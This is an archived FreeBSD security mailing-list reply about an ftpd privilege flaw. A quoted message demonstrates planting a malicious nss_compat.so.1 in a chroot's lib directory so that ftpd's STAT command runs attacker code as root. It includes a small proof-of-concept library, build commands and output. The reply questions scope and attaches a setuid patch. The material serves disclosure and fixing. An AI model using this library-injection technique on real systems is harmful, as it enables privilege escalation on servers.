Date: Wed, 30 Nov 2011 16:01:10 -0800 From: Xin LI <delphij@delphij.net> To: Przemyslaw Frasunek <przemyslaw@frasunek.com> Cc: "freebsd-security@freebsd.org" <freebsd-security@freebsd.org> Subject: Re: ftpd security issue ? Message-ID: <4ED6C3C6.5030402@delphij.net> In-Reply-To: <4ED69B7E.50505@frasunek.com> References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com>
next in thread | previous in thread | raw e-mail | index | archive | help
This is a multi-part message in MIME format. --------------080501020601020809040406 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 On 11/30/11 13:09, Przemyslaw Frasunek wrote: >> Saw this on FD... Anyone know any more details about this ? >> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html > >> > This is a well known hazard of chrooting to directories controlled > by unprivileged users. In this case, vulnerability exists because > ftpd calls /bin/ls with uid=0 and euid!=0 when STAT command is > issued, and nss_compat.so is loaded by libc regardless of elevated > privileges. > > This can be proven by creating dummy ~/lib/nss_compat.so.1: > > [venglin@lagoon ~/lib]$ cat dummy.c #include <stdio.h> #include > <fcntl.h> > > void _init() { FILE *fp = fopen("asdf", "w+"); fprintf(fp, "%d > %d\n", getuid(), geteuid()); } [venglin@lagoon ~/lib]$ cc -o > dummy.o -c dummy.c -fPIC [venglin@lagoon ~/lib]$ cc -shared > -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles > [venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1 > > And after calling STAT command: > > [venglin@lagoon ~/lib]$ cat ~/asdf 0 3000 > > BTW. This vulnerability affects only configurations, where > /etc/ftpchroot exists or anonymous user is allowed to create files > inside etc and lib dirs. This doesn't seem to be typical configuration or no? Will the attached patch fix the problem? (I think libc should just refuse /etc/nsswitch.conf and libraries if they are writable by others by the way) Cheers, - -- Xin LI <delphij@delphij.net> https://www.delphij.net/ FreeBSD - The Power to Serve! Live free or die -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.18 (FreeBSD) iQEcBAEBCAAGBQJO1sPFAAoJEATO+BI/yjfBe+kIANGf3sEKV2iEXnhOEzEJkQFr qOm5niYdxwrnmQ4tjU19Ny+RZ5C9QyIcsvZeYJHLY3AvHGcxKCDc+BfAqHvBbxqF JC1/CbdnflUp3VpNnTvXIkN1/upcZXRU9BmVOXHYg7Ycqrqhom7+57hza2zSZxHO UlKXzLD3O3NIPMgkliJ9YwpsNr4dDrpCItVddWC3yENV33Qc9rOFLMzlwP6qk5Ib XxzCHqg7nNioKDZ0KUeFsSEtk7xT6l5nmRIGQz+YN4CyLWjuZf5EspZSha5VFwwO H+VSvl339AMJDRMUa2g4mLbjpHjYyZAPw+fM+SxPuC4Js1MrhkseZLPAQeoaEWg= =wDbK -----END PGP SIGNATURE----- --------------080501020601020809040406 Content-Type: text/plain; name="popen.diff" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="popen.diff" Index: libexec/ftpd/popen.c =================================================================== --- libexec/ftpd/popen.c (revision 228156) +++ libexec/ftpd/popen.c (working copy) @@ -157,6 +157,7 @@ ftpd_popen(char *program, char *type) } exit(ls_main(gargc, gargv)); } + setuid(geteuid()); execv(gargv[0], gargv); _exit(1); } --------------080501020601020809040406--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?4ED6C3C6.5030402>